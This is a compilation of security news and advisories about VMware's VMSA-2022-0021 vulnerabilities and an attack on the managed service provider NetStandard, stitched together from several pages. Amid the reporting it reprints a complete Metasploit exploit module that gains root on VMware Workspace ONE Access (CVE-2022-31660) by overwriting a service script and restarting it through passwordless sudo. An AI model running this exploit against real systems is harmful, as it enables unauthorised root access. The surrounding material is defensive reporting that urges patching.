Workarounds

Additional Documentation

VMware Cloud Foundation (vRA)

3.x

Any

CVE-2022-31656

9.8

critical

KB89096

KB89084

FAQ

VMware Cloud Foundation (vRA)

3.x

Any

CVE-2022-31658, CVE-2022-31660, CVE-2022-31661, CVE-2022-31664, CVE-2022-31665, CVE-2022-31662, CVE-2022-31663

8.0, 7.8, 7.8, 7.8, 7.6, 5.3, 4.7

important

KB89096

None

FAQ

VMware Cloud Foundation (vRA)

3.x

Any

CVE-2022-31659

N/A

N/A

Unaffected

N/A

N/A

VMware Cloud Foundation (vRA)

3.x

Any

CVE-2022-31657

N/A

N/A

Unaffected

N/A

N/A

****4\. References****

****5\. Change Log****

**2022-08-02: VMSA-2022-0021  
**Initial security advisory.

2022-08-09: VMSA-2022-0021.1

Updated advisory with information that VMware has confirmed malicious code that can exploit CVE-2022-31656 and CVE-2022-31659 in impacted products is publicly available.

****6\. Contact****

CVE-2022-31658: VMSA-2022-0021

A dangerous VMware authentication-bypass bug could give threat actors administrative access over virtual machines.

Several VMware products need to be patched against a critical flaw that would allow authentication bypass for on-premises implementations.

The latest VMware bug is being tracked under CVE-2022-31656 and has a CVSSv3 base score of 9.8, according to the company. 

The VMWare advisory reported the products affected include: 

*   VMware Workspace ONE Access (Access)
*   VMware Workspace ONE Access Connector (Access Connector)
*   VMware Identity Manager (vIDM)
*   VMware Identity Manager Connector (vIDM Connector)
*   VMware vRealize Automation (vRA)
*   VMware Cloud Foundation
*   vRealize Suite Lifecycle Manager

"It is extremely important that you quickly take steps to patch or mitigate these issues in on-premises deployments," the company warned in a security advisory. "If your organization uses ITIL methodologies for change management, this would be considered an 'emergency' change."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Time to Patch VMware Products Against a Critical New Vulnerability

VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Post::File  include Msf::Post::Unix  TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'VMware Workspace ONE Access CVE-2022-31660',          'Description' => %q{            VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges            to those of the root user by modifying a file and then restarting the vmware-certproxy service which            invokes it. The service control is permitted via the sudo configuration without a password.          },          'License' => MSF_LICENSE,          'Author' => [            'Spencer McIntyre'          ],          'Platform' => [ 'linux', 'unix' ],          'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],          'SessionTypes' => ['shell', 'meterpreter'],          'Targets' => [            [ 'Automatic', {} ],          ],          'DefaultOptions' => {            'PrependFork' => true,            'MeterpreterTryToFork' => true          },          'Privileged' => true,          'DefaultTarget' => 0,          'References' => [            [ 'CVE', '2022-31660' ],            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]          ],          'DisclosureDate' => '2022-08-02',          'Notes' => {            # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service            # is disabled by default though.            'Stability' => [CRASH_SERVICE_DOWN],            'Reliability' => [REPEATABLE_SESSION],            'SideEffects' => [ARTIFACTS_ON_DISK]          }        }      )    )  end  def certproxy_service    # this script's location depends on the version, so find it.    return @certproxy_service if @certproxy_service    @certproxy_service = [      '/usr/local/horizon/scripts/certproxyService.sh',      '/opt/vmware/certproxy/bin/certproxyService.sh'    ].find { |path| file?(path) }    vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service    @certproxy_service  end  def sudo(arguments)    cmd_exec("sudo --non-interactive #{arguments}")  end  def check    unless whoami == 'horizon'      return CheckCode::Safe('Not running as the horizon user.')    end    token = Rex::Text.rand_text_alpha(10)    unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token)      return CheckCode::Safe('Cannot invoke the service control script with sudo.')    end    unless writable?(TARGET_FILE)      return CheckCode::Safe('Cannot write to the service file.')    end    CheckCode::Appears  end  def exploit    # backup the original permissions and contents    print_status('Backing up the original file...')    @backup = {      stat: stat(TARGET_FILE),      contents: read_file(TARGET_FILE)    }    if payload.arch.first == ARCH_CMD      payload_data = "#!/bin/bash\n#{payload.encoded}"    else      payload_data = generate_payload_exe    end    upload_and_chmodx(TARGET_FILE, payload_data)    print_status('Triggering the payload...')    sudo("--background #{certproxy_service} restart")  end  def cleanup    return unless @backup    print_status('Restoring file contents...')    file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it    write_file(TARGET_FILE, @backup[:contents])    print_status('Restoring file permissions...')    chmod(TARGET_FILE, @backup[:stat].mode & 0o777)  endend

VMware Workspace ONE Access Privilege Escalation

Red Hat Security Advisory 2022-5821-01 - Kernel-based Virtual Machine offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Issues addressed include buffer overflow, integer overflow, and memory leak vulnerabilities.

Red Hat Security Advisory 2022-5821-01

The attack on MSP NetStandard reminds us once again that MSPs are a very attractive target for cybercriminals
The post NetStandard attack should make Managed Service Providers sit up and take notice appeared first on Malwarebytes Labs.

Posted: August 3, 2022 by

Managed Service Providers (MSPs), organizations that allow companies to outsource a variety of IT and security functions, are a growing market. Because they are a potential gateway to lots of company networks they make a very attractive target for cybercriminals.

In a recent threat advisory Huntress noticed that an increasing number of Initial Access Brokers (IAB) are focusing on MSPs. In a recent example, a US-based MSP called NetStandard suffered a cyberattack causing the company to shut down its MyAppsAnywhere cloud services.

**NetStandard**

On July 27, 2022 NetStandard reported a cyberattack on some of its hosted services to its customers. However, details are sparse, and the MSP is staying silent on the issue. The firm’s website was down at first but it moved it to the cloud relatively fast. But I could find no mention of the attack there.

The information it shared with its customers said:

> “As of approximately 11:30 AM CDT July 26, NetStandard identified signs of a cybersecurity attack within the MyAppsAnywhere environment. Our team of engineers has been engaged on an active incident bridge ever since working to isolate the threat and minimize impact.”

MyAppsAnywhere is an integrated suite of cloud-based hosted services including Dynamics GP, CRM, Exchange, and SharePoint.

**Other targets**

Huntress reports that it also noticed a cybercriminal using the handle “Beeper” looking for help to process an MSP. It concluded that the cybercriminal had probably gained initial access to an MSP and found that it was more than they can handle on their own. Their, translated, forum post says:

> “I have access to the MSP panel of 50+ companies. Over 100 ESXi, 1000+ servers.
> 
> All companies are American and approximately in the same time zone. I want to work qualitatively, but I do not have enough people.”

Around the same time another threat actor going by “vesiyr” posted they had found RDP access to UK companies with an expected revenue of $5 million plus. They were willing to sell that access. The multiple RDP access could mean that vesiyr also gained initial access to an MSP.

**Why MSPs are targets**

While these incidents are very likely unrelated, they show the interest that IABs have in breaching MSPs. Hardly surprising, since it provides them with an opportunity for supply chain attacks or orchestrated attacks on a multitude of victims.

MSPs are an attractive target because a succesful breach can give the attacker enormous leverage, as well as access to some or all of the computer systems of the MSP’s customers. Those customers often rely on the same MSP for security as well, so there is one less hurdle to clear when the threat actor focuses on the MSP’s clients.

Attacks on MSPs are nothing new. In 2018 the Cybersecurity & Infrastructure Security Agency (CISA) released an alert saying it was aware of ongoing APT actor activity attempting to infiltrate the networks of global managed service providers (MSPs).

The holy grail of MSP attacks are unpatched vulnerabilities in software used by MSPs to perform security or administration tasks on customers’ computers. The 2021 attack on Kaseya VSA—an attack that leveraged a vulnerability in a tool used by MSPs to launch ransomware on hundreds of MSP customers’ networks simultaneously—is widely regarded as the worst ransomware attack of all time.

In another ransomware attack, threat actors gained access to an MSP’s ConnectWise control tool and took down operations in 22 small Texas cities in a coordinated attack.

**Mitigation**

MSPs should be aware of both the trust invested in them by their clients and the heightened attention they are likely to receive from IABs.

MSP clients that do not conduct the majority of their own network defense should work with their MSP to determine what they can expect in terms of security. MSP clients should understand the supply chain risk associated with their MSP.

**RELATED ARTICLES**

July 10, 2022 - CISA warns of an unusual ransomware.

June 23, 2022 - Cybersecurity experts want a hotline for SMBs to further encourage cyber incident reporting, especially those involving ransomware attacks.

June 14, 2022 - An obscure group called Karakurt has extorted organizations in the US and elsewhere. Know how to keep it away from your network.

May 19, 2022 - CISA has issued severe warnings about disclosed vulnerabilities in VMWare products that are actively being exploited, probably by APT threat actors.

May 19, 2022 - A joint multi-national cybersecurity advisory has revealed the top ten attack vectors most exploited by cybercriminals in order to gain access to organisation networks.

NetStandard attack should make Managed Service Providers sit up and take notice

Vulnerability—for which a proof-of-concept is forthcoming—is one of a string of flaws the company fixed that could lead to an attack chain.

Vulnerability—for which a proof-of-concept is forthcoming—is one of a string of flaws the company fixed that could lead to an attack chain.

VMware and experts alike are urging users to patch multiple products affected by a critical authentication bypass vulnerability that can allow an attacker to gain administrative access to a system as well as exploit other flaws.

The bug—tracked as CVE-2022-31656—earned a rating of 9.8 on the CVSS and is one of a number of fixes the company made in various products in an update released on Tuesday for flaws that could easily become an exploit chain, researchers said.

CVE-2022-31656 also certainly the most dangerous of these vulnerabilities, and likely will become more so as the researcher who discovered it–Petrus Viet of VNG Security–has promised in a tweet that a proof-of-concept exploit for the bug is “soon to follow,” experts said.

This adds urgency to the need for organizations affected by the flaw to patch now, researchers said.

“Given the prevalence of attacks targeting VMware vulnerabilities and a forthcoming proof-of-concept, organizations need to make patching CVE-2022-31656 a priority,” Claire Tillis, senior research engineer with Tenable’s Security Response Team, said in an email to Threatpost. “As an authentication bypass, exploitation of this flaw opens up the possibility that attackers could create very troubling exploit chains.”

****Potential for Attack Chain****

Specifically, CVE-2022-31656 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation.

The bug affects local domain users and requires that a remote attacker must have network access to a vulnerable user interface, according to a blog post by Tillis published Tuesday. Once an attacker achieves this, he or she can use the flaw to bypass authentication and gain administrative access, she said.

Moreover, the vulnerability is the gateway to exploiting other remote code execution (RCE) flaws addressed by VMWare’s release this week—CVE-2022-31658 and CVE-2022-31659—to form an attack chain, Tillis observed.

CVE-2022-31658 is a JDBC injection RCE vulnerability that affect VMware Workspace ONE Access, Identity Manager and vRealize Automation that’s earned an “important” score on the CVSS—8.0. The flaw allows a malicious actor with administrator and network access to trigger RCE.

CVE-2022-31659 is an SQL injection RCE vulnerability that affects VMware Workspace ONE Access and Identity Manager and also earned a rating of 8.0 with a similar attack vector to CVE-2022-31658. Viet is credited with discovering both of these flaws.

The other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate.

****Patch Early, Patch Everything****

VMware is no stranger to having to rush out patches for critical bugs found in its products, and has suffered its share of security woes due to the ubiquity of its platform across enterprise networks.

In late June, for example, federal agencies warned of attackers pummeling VMware Horizon and Unified Access Gateway (UAG) servers to exploit the now-infamous Log4Shell RCE vulnerability, an easy-to-exploit flaw discovered in the Apache logging library Log4J late last year and continuously targeted on VMware and other platforms since then.

Indeed, sometimes even patching has still not been enough for VMware, with attackers targeting existing flaws after the company does its due diligence to release a fix.

This scenario occurred in December 2020, when the feds warned the adversaries were actively exploiting a weeks-old bug in Workspace One Access and Identity Manager products three days after the vendor patched the vulnerability.

Though all signs point to the urgency of patching the latest threat to VMware’s platform, it’s highly likely that even if the advice is heeded, the danger will persist for the foreseeable future, observed one security professional.

Though enterprises tend to initially move quickly to patch the most imminent threats to their network, they often miss other places attackers can exploit a flaw, observed Greg Fitzgerald, co-founder of Sevco Security, in an email to Threatpost. This is what leads to persistent and ongoing attacks, he said.

“The most significant risk for enterprises isn’t the speed at which they are applying critical patches; it comes from not applying the patches on every asset,” Fitzgerald said. “The simple fact is that most organizations fail to maintain an up-to-date and accurate IT asset inventory, and the most fastidious approach to patch management cannot ensure that all enterprise assets are accounted for.”

VMWare Urges Users to Patch Critical Authentication Bypass Bug

In a critical security advisory VMWare patches multiple RCE and EoP vulnerabilities in several affected products.
The post Update now! VMWare patches critical vulnerabilities in several products appeared first on Malwarebytes Labs.

In a new critical security advisory, VMSA-2022-0021, VMWare describes multiple vulnerabilities in several of its products, one of which has a CVSS score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.

**Vulnerabilities**

VMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to ‘root’ on unpatched servers.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.

**CVE-2022-31656**

CVE-2022-31656 is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher Petrus Viet with discovering this vulnerability.)

**CVE-2022-31659 and CVE-2022-31658**

The same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10—CVE-2022-31658 and CVE-2022-31659. CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 us a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.

**CVE-2022-31665**

CVE-2022-31665 is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.

**Other privilege escalation vulnerabilities**

Besides the already mentioned vulnerability listed as CVE-2022-31656 VMWare fixed CVE-2022-31660, CVE-2022-31661, and CVE-2022-31664 which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to ‘root’.

**Mitigation**

Even though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.

To fully protect yourself and your organization, please install one of the patch versions listed in the VMware Security Advisory, or use the workarounds listed in the VMSA.

Stay safe, everyone!

Tag

#vmware